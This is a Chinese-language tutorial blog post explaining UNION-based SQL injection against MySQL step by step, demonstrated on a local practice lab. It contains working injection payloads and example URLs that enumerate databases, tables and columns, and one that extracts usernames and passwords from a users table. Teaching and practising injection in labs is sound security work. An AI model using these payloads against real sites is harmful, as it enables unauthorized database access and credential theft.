SQL注入之联合查询注入
大家好,又见面了,我是你们的朋友全栈君。
联合查询注入利用的前提
前提条件:页面上有显示位
什么是显示位?
在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数 据展示在页面中,这个展示数据的位置就叫显示位
联合注入的过程
1、判断注入点
2、判断是整型还是字符型
3、判断查询列数 4、判断显示位 5、获取所有数据库名 6、获取数据库所有表名 7、获取字段名
8、获取字段中的数据
一、判断注入点
我们在可能存在SQL注入变量的后边添加以下payload:
and 1=1 / and 1=2 回显页面不同(整形判断)
单引号判断‘ 显示数据库错误信息或者页面回显不同(整形,字符串类型判断)
\ (转义符)
-1/+1 回显下一个或上一个页面(整型判断)
注:加号‘+’在URL中有特殊含义,因此在需要对其进行URL编码为%2b
二、判断是整型还是字符型
输入and 1=1和and 1=2后发现页面没有变化,判断不是整型注入
输入’ and 1=1 %23和 ‘ and 1=2%23后发现页面变化,判断为字符注入
为什么输入 1 and 1=1 和 1 and 1=2 能判断是否是整型注入尼?
在数据库中 1=1 和1=2 后面随便输入字符串(相当于1=1和1=2后面的查询语句),发现select 1=”1dasd”时返回1正确,1=”2dasd”时返回0错误,即select在查询时忽略后面的字符串,只让1和后面第一个数字对比,如果相等就是正确,不相等返回错误。
三、判断查询列数
order by 函数是对MySQL中查询结果按照指定字段名进行排序,除了指定字 段名还可以指定字段的栏位进行排序,第一个查询字段为1,第二个为2,依次 类推。我们可以通过二分法来猜解列数
输入 order by 4%23 发现页面错误,说明没有4列
输入3列时,页面正常,说明有3列
四、判断显示位
UNION的作用是将两个select查询结果合并,如下图所示:
程序在展示数据的时候通常只会取结果集的第一行数据,看一下源码,mysql_fetch_array只被调用了一次,而mysql_fetch_array从结果集中取得一行作为关联数组或数字数组或二者兼有,具体看第二个参数是什么。所以这里无论怎么折腾最后只会出来第一行的查询结果。
只要让第一行查询的结果是空集,即union左边的select子句查询结果为空,那么union右边的查询结果自然就成为了第一行,打印在网页上了
可以看到将uid改为-1后第二行打印在页面上。
使union前面的语句报错,执行后面的,爆出显示位,2,3
五、获取所有数据库名
group_concat()一次性显示:
select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA
显示当前数据库: databas()
六、获取表名
http://127.0.0.1/sql/Less-1/?id=-1′ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=’security’),3%23
七、获列名
http://127.0.0.1/sql/Less-1/?id=-1′ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’),3%23
八、获取列中的信息
http://127.0.0.1/sql/Less-1/?id=-1′ union select 1,(select concat_ws(char(32,58,32),username,password) from users limit 1,1),3%23
用limit控制,一行行得到数据
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/143903.html原文链接:https://javaforall.cn